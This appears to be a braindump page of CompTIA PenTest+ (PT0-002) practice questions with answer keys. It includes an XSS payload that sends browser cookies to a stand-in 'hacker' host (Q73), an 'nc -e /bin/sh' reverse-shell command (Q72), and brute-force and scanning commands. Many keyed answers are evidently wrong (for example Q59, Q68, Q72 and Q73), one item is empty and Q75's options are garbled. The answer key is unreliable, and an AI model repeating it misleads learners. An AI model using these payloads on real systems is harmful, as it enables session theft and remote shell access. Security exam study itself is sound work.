[Oct 28, 2021] Updates Up to 365 days On Valid PT0-002 Braindumps [Q57-Q78]


Best Quality PT0-002 Exam Questions CompTIA Test To Gain Brilliant Result

NEW QUESTION 57
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

  • A. Utilize an nmap -sV scan against the service
  • B. Manually check the version number of the VoIP service against the CVE release
  • C. Test with proof-of-concept code from an exploit database
  • D. Review SIP traffic from an on-path position to look for indicators of compromise

Answer: A

 

NEW QUESTION 58
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  • A. ROE
  • B. MSA
  • C. NDA
  • D. SLA

Answer: C

 

NEW QUESTION 59
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

  • A. Performing spear phishing against employees by posing as senior management
  • B. Using a brute-force attack against the external perimeter to gain a foothold
  • C. Dropping a malicious USB key with the company's logo in the parking lot
  • D. Attempting to tailgate an employee going into the client's workplace

Answer: B

 

NEW QUESTION 60
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

  • A. may reduce the true positive rate of findings.
  • B. may cause unintended failures in control systems.
  • C. will create a denial-of-service condition on the IP networks.
  • D. will reveal vulnerabilities in the Modbus protocol.

Answer: B

 

NEW QUESTION 61
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

  • A. Wireshark
  • B. Aircrack-ng
  • C. Kismet
  • D. Wifite

Answer: B

 

NEW QUESTION 62
Which of the following is the MOST effective person to validate results from a penetration test?

  • A. Third party
  • B. Chief Information Officer
  • C. Client
  • D. Team leader

Answer: D

 

NEW QUESTION 63
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






Answer:

Explanation:

 

NEW QUESTION 64
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

  • A. OWASP ZAP
  • B. Drozer
  • C. Burp Suite
  • D. OpenVAS

Answer: D

 

NEW QUESTION 65
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?

  • A. Malware injection
  • B. Direct-to-origin
  • C. Cross-site scripting
  • D. Credential harvesting

Answer: B

 

NEW QUESTION 66
Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?

  • A. URL enumeration
  • B. Website cloning
  • C. Website scraping
  • D. Domain enumeration

Answer: C

 

NEW QUESTION 67
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

  • A. OSSTMM
  • B. PTES technical guidelines
  • C. NIST SP 800-115
  • D. OWASP Web Security Testing Guide

Answer: B

 

NEW QUESTION 68
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. Open-source research
  • B. Traffic sniffing
  • C. A vulnerability scan
  • D. An Nmap scan
  • E. A ping sweep
  • F. Port knocking

Answer: C,D

 

NEW QUESTION 69
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

  • A. Implement a patch management plan
  • B. Utilize the secure software development life cycle
  • C. Deploy a user training program
  • D. Configure access controls on each of the servers

Answer: A

 

NEW QUESTION 70
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

  • A. Cain and Abel
  • B. John the Ripper
  • C. Mimikatz
  • D. Hydra

Answer: B

 

NEW QUESTION 71
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -Ss22-25,80
  • B. nmap 192.168.1.1-5 -PA22-25,80
  • C. nmap 192.168.1.1-5 -PU22-25,80
  • D. nmap 192.168.1.1-5 -PS22-25,80

Answer: D

 

NEW QUESTION 72
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Run the nc -e /bin/sh <...> command.
  • B. Obtain /etc/shadow and brute force the root password.
  • C. Move laterally to create a user account on LDAP
  • D. Create a one-shot systemd service to establish a reverse shell.

Answer: A

 

NEW QUESTION 73
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Input validation
  • B. Web-application firewall
  • C. Output encoding
  • D. Session tokens
  • E. Base64 encoding
  • F. Parameterized queries

Answer: D,F

 

NEW QUESTION 74
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. bcrypt
  • B. SHA-1
  • C. PBKDF2
  • D. MD5

Answer: D

 

NEW QUESTION 75
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

  • A. Option C
  • B. Option A
  • C. Option B
  • D. Option D

Answer: B

 

NEW QUESTION 76
A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team will be given access to source code for analysis.
  • B. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • C. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  • D. The reverse-engineering team may have a history of selling exploits to third parties.

Answer: A

 

NEW QUESTION 77
A penetration tester runs a scan against a server and obtains the following output:
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2012 Std
3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

  • A. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 -U guest
  • B. nmap --script vuln -sV 192.168.53.23
  • C. curl -X TRACE https://192.168.53.23:8443/index.aspx
  • D. ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
  • E. ftp 192.168.53.23

Answer: E

 

NEW QUESTION 78
......
